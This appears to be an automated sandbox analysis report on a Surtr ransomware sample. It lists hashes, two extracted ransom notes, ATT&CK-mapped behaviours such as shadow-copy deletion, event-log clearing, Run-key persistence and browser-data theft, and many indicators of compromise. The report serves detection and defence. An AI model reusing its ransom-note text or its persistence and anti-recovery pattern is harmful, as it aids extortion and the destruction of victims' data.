7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b

Analysis

max time kernel
119s
max time network
119s
platform
windows7_x64
resource
win7-en-20211208
submitted
01-01-2022 20:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
Size

1.2MB
MD5

09d73a4f9a9b1f31e90978e5f32f97cd
SHA1

6482d6d44f2ec6a9477d365a7d547ae86724da5f
SHA256

7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b
SHA512

f3afb2ce031d58063a66642dc07c535e35f3ead6c6c88b5104177a37d15082d7680a18e0a1ee349f7b2bdcaa0ac36f5e2d07ff49b6696e21039e5338d73d7147

Score

10^/10

evasion persistence ransomware spyware stealer trojan upx

Malware Config

Extracted

Path

C:\ProgramData\Service\SURTR_README.txt

Ransom Note

What happened to your files? Unfortunately, your server was compromised, using a security hole in your server. All your files are encrypted with a military algorithm . in order to contact us you can email this address [email protected] use this ID( 0xweYLUpVbTohp ) for the title of your email. if you weren't able to contact us within 24 hours please email : [email protected] Only we can decrypt your files. Please do not contact separate fraudulent sites. You can use freeand even paid software on the Internet, but it is uselessand will cause you to lose filesand timeand money.

Emails

[email protected]

Extracted

Path

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta

Ransom Note

SurtrRansomware OOPS ALL YOUR IMPORTANT FILES HAVE BEEN ENCRYPTED AND STOLEN !! Notice : There is only one way to restore your data read the boxes carefully! Attention : Do Not change file names. Do Not try to decrypt using third party softwares , it may cause permanent data loss . If you do not pay the fee within one month , your important files will be published in our public belog . Do not pay any money before decrypting the test files. You can use our 50% discount if you pay the fee within first 15 days of encryption . otherwise the price will be doubled. In order to warranty you , our team will decrypt 3 of your desired files for free.but you need to pay the specified price for the rest of the operation . How To Decrypt : Your system is offline . in order to contact us you can email this address [email protected] use this ID (0xweYLUpVbTohp) for the title of your email . If you weren't able to contact us within 24 hours please email : [email protected] If you didn't get any respond within 48 hours use this link (Not Available Now).send your ID and your cryptor name (SurtrRansomwareUserName) therefore we can create another way to contact you as soon as possible

Emails

[email protected]

Signatures

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
3472	bcdedit.exe
3528	bcdedit.exe

Blocklisted process makes network request 5 IoCs

flow	pid	Process
6	3240	Process not Found
7	3240	Process not Found
9	3240	Process not Found
11	3240	Process not Found
13	3240	Process not Found

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000400000000b594-120.dat	upx
behavioral1/files/0x000600000001263f-627.dat	upx
behavioral1/files/0x000600000001303f-628.dat	upx
behavioral1/files/0x00060000000130ff-629.dat	upx

Drops startup file 7 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	Process not Found

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos3 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\svchos4 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos1 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos2 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe

Enumerates connected drives 3 TTPs 49 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\X:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\Q:	vssadmin.exe
File opened (read-only)	\??\N:	vssadmin.exe
File opened (read-only)	\??\V:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\M:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\N:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\O:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\R:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\U:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\J:	vssadmin.exe
File opened (read-only)	\??\X:	vssadmin.exe
File opened (read-only)	\??\L:	vssadmin.exe
File opened (read-only)	\??\Y:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\I:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\Z:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\J:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\T:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\B:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\R:	cmd.exe
File opened (read-only)	\??\P:	vssadmin.exe
File opened (read-only)	\??\E:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\K:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\L:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\S:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\M:	vssadmin.exe
File opened (read-only)	\??\F:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\H:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\T:	vssadmin.exe
File opened (read-only)	\??\A:	vssadmin.exe
File opened (read-only)	\??\P:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\Z:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\A:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\V:	vssadmin.exe
File opened (read-only)	\??\W:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\Y:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\G:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\W:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\O:	cmd.exe
File opened (read-only)	\??\K:	vssadmin.exe
File opened (read-only)	\??\B:	vssadmin.exe
File opened (read-only)	\??\Q:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\U:	reg.exe
File opened (read-only)	\??\S:	vssadmin.exe
File opened (read-only)	\??\I:	vssadmin.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\Service\\SurtrBackGround.jpg"	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PPINTL.DLL.IDX_DLL.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REPLTMPL.CFG.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\BlackTieLetter.dotx.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Java\jre7\lib\accessibility.properties.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-oql.xml.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\PAPYRUS\PAPYRUS.ELM.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01866_.WMF.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02957_.WMF.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\WWINTL.DLL.IDX_DLL.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Windows Photo Viewer\PhotoAcq.dll.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\js\highDpiImageSwap.js.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Moncton.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287020.WMF.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107090.WMF.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Help\1042\hxdsui.dll.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04369_.WMF.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Angles.eftx.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\text_renderer\libsapi_plugin.dll.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl.css.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\DirectDB.dll.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.properties.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\vlc.mo.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\36.png.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\MSClientDataMgr\MSCDM.DLL.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\logo.png.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\InkDiv.dll.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN00965_.WMF.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01474_.WMF.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME27.CSS.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\STUDIO\THMBNAIL.PNG.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationUp_SelectionSubpicture.png.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File created	C:\Program Files\Microsoft Games\SURTR_README.txt	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\es-ES\currency.html.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0285360.WMF.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR4B.GIF.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\MSTTSCommon.dll.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\codec\libdav1d_plugin.dll.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0301480.WMF.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCDREQL.ICO.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\fr\System.Web.Entity.Resources.dll.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Etc\GMT-2.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Star_Full.png.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01130_.WMF.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\WINWORD_COL.HXC.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\ja-JP\gadget.xml.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-first-quarter.png.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01143_.WMF.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182898.WMF.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00693_.WMF.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\square_h.png.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Java\jre7\lib\cmm\PYCC.pf.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\es-ES\js\slideShow.js.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187817.WMF.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_center.gif.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\SubsetList\Client.xml.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui_5.5.0.165303.jar.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_zh_CN.jar.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiling.xml.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\vlc.mo.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\system_h.png.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0090386.WMF.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2836	schtasks.exe
3240	schtasks.exe
1064	Process not Found

Interacts with shadow copies 2 TTPs 27 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
2672	vssadmin.exe
2616	vssadmin.exe
2576	vssadmin.exe
2600	vssadmin.exe
2584	vssadmin.exe
2640	vssadmin.exe
2228	vssadmin.exe
2188	vssadmin.exe
2252	vssadmin.exe
2220	vssadmin.exe
2448	vssadmin.exe
2656	vssadmin.exe
2592	vssadmin.exe
2568	vssadmin.exe
2548	vssadmin.exe
2664	vssadmin.exe
2244	vssadmin.exe
2648	vssadmin.exe
2608	vssadmin.exe
2624	vssadmin.exe
2236	vssadmin.exe
2212	vssadmin.exe
2532	vssadmin.exe
2632	vssadmin.exe
2140	vssadmin.exe
2312	vssadmin.exe
2456	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main	Process not Found

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file\DefaultIcon	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file\DefaultIcon\ = "C:\\ProgramData\\Service\\SurtrIcon.ico"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.surt	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.surt\ = "surt_auto_file"	Process not Found

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1820	Process not Found

Runs net.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1624	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeBackupPrivilege	2484	vssvc.exe
Token: SeRestorePrivilege	2484	vssvc.exe
Token: SeAuditPrivilege	2484	vssvc.exe
Token: SeSecurityPrivilege	3948	wevtutil.exe
Token: SeBackupPrivilege	3948	wevtutil.exe
Token: SeSecurityPrivilege	3916	wevtutil.exe
Token: SeBackupPrivilege	3916	wevtutil.exe
Token: SeSecurityPrivilege	3956	wevtutil.exe
Token: SeBackupPrivilege	3956	wevtutil.exe
Token: SeSecurityPrivilege	3988	wevtutil.exe
Token: SeBackupPrivilege	3988	wevtutil.exe
Token: SeSecurityPrivilege	4012	wevtutil.exe
Token: SeBackupPrivilege	4012	wevtutil.exe
Token: SeSecurityPrivilege	4044	wevtutil.exe
Token: SeBackupPrivilege	4044	wevtutil.exe
Token: SeSecurityPrivilege	4036	wevtutil.exe
Token: SeBackupPrivilege	4036	wevtutil.exe
Token: SeSecurityPrivilege	4004	wevtutil.exe
Token: SeBackupPrivilege	4004	wevtutil.exe
Token: SeSecurityPrivilege	4084	wevtutil.exe
Token: SeBackupPrivilege	4084	wevtutil.exe
Token: SeSecurityPrivilege	4068	wevtutil.exe
Token: SeBackupPrivilege	4068	wevtutil.exe
Token: SeSecurityPrivilege	4048	wevtutil.exe
Token: SeBackupPrivilege	4048	wevtutil.exe
Token: SeSecurityPrivilege	4088	wevtutil.exe
Token: SeBackupPrivilege	4088	wevtutil.exe
Token: SeSecurityPrivilege	3100	Process not Found
Token: SeBackupPrivilege	3100	Process not Found
Token: SeSecurityPrivilege	2440	wevtutil.exe
Token: SeBackupPrivilege	2440	wevtutil.exe
Token: SeSecurityPrivilege	3092	wevtutil.exe
Token: SeBackupPrivilege	3092	wevtutil.exe
Token: SeSecurityPrivilege	2948	wevtutil.exe
Token: SeBackupPrivilege	2948	wevtutil.exe
Token: SeSecurityPrivilege	3104	wevtutil.exe
Token: SeBackupPrivilege	3104	wevtutil.exe
